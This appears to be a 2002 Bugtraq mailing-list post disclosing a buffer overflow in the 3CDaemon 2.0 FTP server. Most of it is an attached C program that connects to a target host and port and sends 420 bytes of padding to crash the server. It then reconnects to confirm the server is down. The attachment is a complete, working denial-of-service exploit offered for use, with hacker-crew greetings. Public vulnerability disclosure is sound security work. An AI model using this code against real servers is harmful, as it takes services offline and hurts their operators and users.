3CDaemon DoS exploit
Date: Tue, 30 Apr 2002 06:43:53 +0200
From: skyrim msh <skyrim@hotmail.com>
To: bugtraq@securityfocus.com
Subject: 3CDaemon DoS exploit
------=_NextPart_000_74ae_6d9d_23c8
Content-Type: text/plain; format=flowed
3Cdaemon 2.0 revision 10 for the Windows platform contains a BOF
vulnerability at all times, including the login prompt. When 400+ chars are
sent to the FTP server, it crashes emmediatly. Remote exploit is included.
For more details see the exploit as well.
greets,
skyrim - skyrim@madskill.tk
MaD SKiLL 'H' - http://www.madskill.tk
_________________________________________________________________
Join the world▓s largest e-mail service with MSN Hotmail.
http://www.hotmail.com
------=_NextPart_000_74ae_6d9d_23c8
Content-Type: text/plain; name="msh3comdos.c"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="msh3comdos.c"
/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
* 1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they're send.
*
* Tested on:
* [OS] [version]
* Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
*
* ###
* ##### #### ##
* ###### ###### ######
* ###### ######## ######## ######## ######
* ###### ####### ### ########### ######## #######
* ###### ######## #### ############ ######## #######
* ############### ##### ############ ####### #######
* ############## ###### ############ ####### #######
* ############## ####### ########### ###### #######
* ############# ######## ### ######## ###### #########
* ############ ### #### ### ####### #################
* ##### ############### ########## #################
* ### ######### ##### ######### ################
* #### ######### ##### ######### ################
* ### ######### ############# ################
* ## ######### ###### ###### #######
* ### #### ###### #######
* ###### ########
* ###### ########
* #### ## ###### ### ### ### ###### ########
* ####### ######## ### #### ##### ##### #######
* ############### ### #### ##### ##### #######
* ####### ######## #### ##### ## ###
* ###### ######### #### #### #####
* ##### ######## #### #### ####
* ###### ######## #### #### ### #### ##
* ########## ### #### #### ########## ######
* ######### ### ###########################
* ########## ######## #####################
* ############# ###### ########## ##########
* ######## ##### #### ### ### ### ###
*
* I don't know if this will work on versions other then the one I tested it
on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam,
frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim (skyrim@m4dskill.tk)
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define BOFSIZE 420
char banner(void) { printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10
DoS\n.:[MsH]:.\n ---\n"); }
void E(char *msg) { perror(msg); exit(1); }
main(int argc, char *argv[])
{
static char ownage[BOFSIZE];
int sockfd, sockfd2, n;
struct sockaddr_in server_addr;
struct hostent *server;
if (argc != 3) {
fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]);
exit(1);
}
banner();
memset(ownage, 'A', BOFSIZE);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) E("Error occured during opening socket");
server = gethostbyname(argv[1]);
if (server == NULL) E("Error occured during host lookup -No such
host?-\n");
bzero((char *) &server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr,
(char *)&server_addr.sin_addr.s_addr,
server->h_length);
server_addr.sin_port = htons(atoi(argv[2]));
printf("Connecting to target FTP server... ");
if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E("Error
occured during connecting\n"); }
printf("Connected, Probing BOF... \n");
n = write(sockfd,ownage,strlen(ownage));
if (n < 0) { E("Error occured during writing to socket"); }
close(sockfd);
sockfd2=socket(AF_INET, SOCK_STREAM, 0);
printf("Done, checking if server is dead.. \n");
sleep(5);
if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) {
printf("Couldn't establish connection: It seems like it died! =)\n");
exit(0); }
printf("Server is still alive. Perhaps its not vulnerable?\n");
return 0;
}
------=_NextPart_000_74ae_6d9d_23c8--
